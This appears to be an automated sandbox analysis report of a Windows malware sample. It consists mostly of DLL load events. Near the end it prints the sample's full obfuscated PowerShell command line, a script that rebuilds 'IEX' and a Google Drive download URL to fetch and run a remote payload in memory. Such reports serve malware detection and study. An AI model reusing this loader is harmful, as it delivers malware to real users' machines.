              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: comsvcs.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cmlua.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cmutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: Binary string: System.Management.Automation.pdbR_" source: powershell.exe, 00000004.00000002.1338372516.00000217A1BB0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: m.Core.pdb9s source: powershell.exe, 0000000E.00000002.1641329361.00000000070A1000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: m.Core.pdb+ source: powershell.exe, 00000004.00000002.1340541608.00000217A1E25000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: .Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000004.00000002.1338372516.00000217A1C11000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("Powershell "echo $Chairlift;function Opgrelsesdatoer($Perdricide){ .($Buenas) ($Perdricide)} function ampler($Env", "0")
              Source: Yara matchFile source: 0000000E.00000002.1651117439.000000000C0B1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.1650896960.0000000008480000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.1634500880.00000000057C5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.1323764875.00000217997CD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Flared)$GLobaL:pROcELLARIIDAe = [SysTem.text.ENCOdIng]::aSCIi.GeTSTRinG($uNcRystaLliZAbIlItiEs)$GlObAL:SPlEJsene=$ProceLLaRIIDae.SUbsTring($SLEvenes,$brnEvrNenES241)<#Djehad Causerie
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((dolkes $Silverleaves191 $etologis), (udgrftningens @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Suggestivt = [AppDomain]::CurrentDomain.GetAssemblies()$
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Benedict)), $Unmatchable136).DefineDynamicModule($Ichnography, $false).DefineType($Hissel, $Gylpedes100, [System.MulticastDelegate])$G
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Flared)$GLobaL:pROcELLARIIDAe = [SysTem.text.ENCOdIng]::aSCIi.GeTSTRinG($uNcRystaLliZAbIlItiEs)$GlObAL:SPlEJsene=$ProceLLaRIIDae.SUbsTring($SLEvenes,$brnEvrNenES241)<#Djehad Causerie
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Chairlift;function Opgrelsesdatoer($Perdricide){ .($Buenas) ($Perdricide)} function ampler($Envoyjcs){$Demineraliserings=4;do{$Yamshik+=$Envoyjcs[$Demineraliserings];$Demineraliserings+=5;$Tenebrosity=Format-List} until(!$Envoyjcs[$Demineraliserings])$Yamshik}$Meddelagtig=ampler 'Ho enSp jeSepaTOoph..nglW';$Meddelagtig+=ampler ' HereBldgBStudCCrocLIsoci ReaEF ignpseuT';$Marginellidae=ampler 'KravM sunoKampzVariiRacil Mullun aaKrad/';$Libretto=ampler 'Rec.TCerilDjersUnst1Dobb2';$trediveaarsfdselsdagene='Ki l[Sortn CeceS roTSamm.AmblS.emoe Klarsuppvtun IUp,lcSu.fE.awtpLoy o icaI K fNSibeTPar mL upa Tacn Pa asigggFaitE porR Esk]Cape:d fe:BlteSExigeAstrcBlafU Mi rNyanIDisitPaadY Sk PBirerCircoTinftSaldot.evcC.asOabyillabe= Udp$UdviLTortiO thbencar SpeEBlewTRu.dTWillO';$Marginellidae+=ampler 'Noni5 ui.Zaza0P da E.v(BuggWKommi Counomlad Endoaf,twAfsksKore GhetN DomTRa e T ks1Told0Upfu.Orch0 Kai;.mpe ,egeWTi.vi Ko,n fut6 Sta4Rube;Ps.u KvarxCald6Kuki4Skin;Posi GlacrDimnvFrmn:Effe1Ti e3Ext 4zinn. Mod0Pind)Fald osGHan ePushcAntikHydro Dor/ Ago2Cali0Tl.e1Terp0sa k0d if1Uafl0 D s1S gu LyssF Se,i Pirr.apie CorfSh noPeelx Ban/be.e1Tann3Seiz4 Sho. Una0';$Lygteples240=ampler 'KursUBarnsLongE BalrL.ng-SunrAGodkgUnsheO erNOve.T';$Garanteret=ampler 'ProdhTapetRicktPronp SabsUdvi:.ere/Co o/GasldFormr Ur,iC tovHoa e C n. ludgMi tolarvoAcangBrstlUnreeColo. blocWantoGen,mTy n/HernuBr tcKnar?Galoe TvixB trpba toRegnrRacitP la=VinddPlanoAl owSt.knK oklPebeoSheda geadHove&A kai UnbdViru=Envi1 dsdlobjeUTale6 Domo EroBEngarRos MBrd HBariW inET ar9Cha KOutamSpil-FjorjBa lnNaadgSyno8ChecETeatUKertzcapiPParcgFolkDRekrNTowp-Geos8.elvKWindgSev h op 8KalcM';$Lvfaldet=ampler 'mi.d>';$Buenas=ampler ' dgri .arELinjX';$Brugstyveriers='Flippermaskiner';$Bajerflasker='\Foremilks.sig';Opgrelsesdatoer (ampler 'Bulg$DratGGalilUndeOColoBTrilA ComL red:unwrDManciCompv KlaI Ta DStdpe ploRBamsEStan=flok$ CaveS.mtNStanVsub,:Gl caH.kep Vitp Sped OmrAFangtV poAArte+awin$UnjuBBoliaVandjVarmeGeorr S.cF NonlSus a SplSOverK Ca,E DkkR');Opgrelsesdatoer (ampler 'Or r$Saddg In LX,nook rrBParaaHylil H,r:ejerdOpilE SkoKRedeLUds,aPe.dmChopAAlliTAs liRes,o DisnLears Whin KreUAggrm SparF.rleRecitHapsSdest=Bsse$TegnGYuccaZophRDemaABragnSvent VseeK,onR yste HopTsabu.BiltSOvipp aikl BotISummTFibr(Blue$ we lBaarvMaxcF KvaaPortlSygedEmmee.nfeTSn g)');Opgrelsesdatoer (ampler $trediveaarsfdselsdagene);$Garanteret=$Deklamationsnumrets[0];$Multilobulated=(ampler ' Aut$ istgj hnllikvO hotBSwasa KralCont:Spo i AfbNStanf Mi oOreor Ve mCol,ACompT NomIC,enO PepNCo.rSDolldUnpoeR.sbL BessU.va=Fr sNG dsESkinW Gen- MelOPengBDiviJGrabeTraaC Mu Tgr,v TaarSEtaaYIsolSBallT Da,eSekuMLed .Cel $Datam Be ePr fd AtaD AlpeRingLHi eAVinegTammT MasI SmoG');Opgrelsesdatoer ($Multilobulated);Opgrelsesdatoer (ampler 'T,rs$Vir I KunnSelefUd,to S.erMikrmAfvraMavetFormiFainoK innJydesindedFinaeGob,l oods Slg. BalHH
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "echo $Chairlift;function Opgrelsesdatoer($Perdricide){ .($Buenas) ($Perdricide)} function ampler($Envoyjcs){$Demineraliserings=4;do{$Yamshik+=$Envoyjcs[$Demineraliserings];$Demineraliserings+=5;$Tenebrosity=Format-List} until(!$Envoyjcs[$Demineraliserings])$Yamshik}$Meddelagtig=ampler 'Ho enSp jeSepaTOoph..nglW';$Meddelagtig+=ampler ' HereBldgBStudCCrocLIsoci ReaEF ignpseuT';$Marginellidae=ampler 'KravM sunoKampzVariiRacil Mullun aaKrad/';$Libretto=ampler 'Rec.TCerilDjersUnst1Dobb2';$trediveaarsfdselsdagene='Ki l[Sortn CeceS roTSamm.AmblS.emoe Klarsuppvtun IUp,lcSu.fE.awtpLoy o icaI K fNSibeTPar mL upa Tacn Pa asigggFaitE porR Esk]Cape:d fe:BlteSExigeAstrcBlafU Mi rNyanIDisitPaadY Sk PBirerCircoTinftSaldot.evcC.asOabyillabe= Udp$UdviLTortiO thbencar SpeEBlewTRu.dTWillO';$Marginellidae+=ampler 'Noni5 ui.Zaza0P da E.v(BuggWKommi Counomlad Endoaf,twAfsksKore GhetN DomTRa e T ks1Told0Upfu.Orch0 Kai;.mpe ,egeWTi.vi Ko,n fut6 Sta4Rube;Ps.u KvarxCald6Kuki4Skin;Posi GlacrDimnvFrmn:Effe1Ti e3Ext 4zinn. Mod0Pind)Fald osGHan ePushcAntikHydro Dor/ Ago2Cali0Tl.e1Terp0sa k0d if1Uafl0 D s1S gu LyssF Se,i Pirr.apie CorfSh noPeelx Ban/be.e1Tann3Seiz4 Sho. Una0';$Lygteples240=ampler 'KursUBarnsLongE BalrL.ng-SunrAGodkgUnsheO erNOve.T';$Garanteret=ampler 'ProdhTapetRicktPronp SabsUdvi:.ere/Co o/GasldFormr Ur,iC tovHoa e C n. ludgMi tolarvoAcangBrstlUnreeColo. blocWantoGen,mTy n/HernuBr tcKnar?Galoe TvixB trpba toRegnrRacitP la=VinddPlanoAl owSt.knK oklPebeoSheda geadHove&A kai UnbdViru=Envi1 dsdlobjeUTale6 Domo EroBEngarRos MBrd HBariW inET ar9Cha KOutamSpil-FjorjBa lnNaadgSyno8ChecETeatUKertzcapiPParcgFolkDRekrNTowp-Geos8.elvKWindgSev h op 8KalcM';$Lvfaldet=ampler 'mi.d>';$Buenas=ampler ' dgri .arELinjX';$Brugstyveriers='Flippermaskiner';$Bajerflasker='\Foremilks.sig';Opgrelsesdatoer (ampler 'Bulg$DratGGalilUndeOColoBTrilA ComL red:unwrDManciCompv KlaI Ta DStdpe ploRBamsEStan=flok$ CaveS.mtNStanVsub,:Gl caH.kep Vitp Sped OmrAFangtV poAArte+awin$UnjuBBoliaVandjVarmeGeorr S.cF NonlSus a SplSOverK Ca,E DkkR');Opgrelsesdatoer 